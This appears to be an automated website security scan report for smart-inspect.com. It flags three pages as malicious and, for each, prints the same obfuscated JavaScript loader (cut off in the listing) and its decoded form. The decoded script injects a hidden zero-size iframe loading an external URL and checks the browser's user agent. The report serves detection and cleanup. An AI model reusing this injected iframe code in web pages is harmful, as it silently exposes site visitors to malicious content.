Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=smart-inspect.com
Result: Google has marked this website as suspicious - visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.smart-inspect.com/ | 200 OK Content-Length: 6167 Content-Type: text/html | clean |
http://www.smart-inspect.com/index.html | 200 OK Content-Length: 6167 Content-Type: text/html | clean |
http://www.smart-inspect.com/process.html | 200 OK Content-Length: 11681 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script found in the page (the listing is cut off inside GrY1):
function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; }
function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6= [listing truncated in the report]
Decoded script:
var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
document.body.appendChild(Obby);
Note: Nrx4 is a replace-all helper, and GrY1 uses it to restore quote and backslash placeholders before swapping character codes to unpack the payload. The decoded script appends a zero-size iframe styled display:none to the page body, with its src set to the external URL above, so the visitor's browser loads that URL without anything visible on the page. The user-agent checks for 'msie', 'nt 6.' and 'msie 8' are computed, but this excerpt does not show how their results are used.
Antivirus reports:
http://www.smart-inspect.com/links.html | 200 OK Content-Length: 10054 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script found in the page (the listing is cut off inside GrY1):
function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; }
function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6= [listing truncated in the report]
Decoded script:
var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
document.body.appendChild(Obby);
Note: Nrx4 is a replace-all helper, and GrY1 uses it to restore quote and backslash placeholders before swapping character codes to unpack the payload. The decoded script appends a zero-size iframe styled display:none to the page body, with its src set to the external URL above, so the visitor's browser loads that URL without anything visible on the page. The user-agent checks for 'msie', 'nt 6.' and 'msie 8' are computed, but this excerpt does not show how their results are used.
Antivirus reports:
http://www.smart-inspect.com/contact.html | 200 OK Content-Length: 9700 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script found in the page (the listing is cut off inside GrY1):
function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; }
function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6= [listing truncated in the report]
Decoded script:
var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
document.body.appendChild(Obby);
Note: Nrx4 is a replace-all helper, and GrY1 uses it to restore quote and backslash placeholders before swapping character codes to unpack the payload. The decoded script appends a zero-size iframe styled display:none to the page body, with its src set to the external URL above, so the visitor's browser loads that URL without anything visible on the page. The user-agent checks for 'msie', 'nt 6.' and 'msie 8' are computed, but this excerpt does not show how their results are used.
Antivirus reports:
http://www.smart-inspect.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://www.smart-inspect.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: smart-inspect.com
Result: [no result text is included in this copy of the report]
Second query (visit from search engine):
GET / HTTP/1.1
Host: smart-inspect.com
Referer: http://www.google.com/search?q=smart-inspect.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Note: both queries request only the home page (/). The injected script reported above on process.html, links.html and contact.html runs in the visitor's browser and is not an HTTP redirect, so a clean redirect check does not mean the site is clean.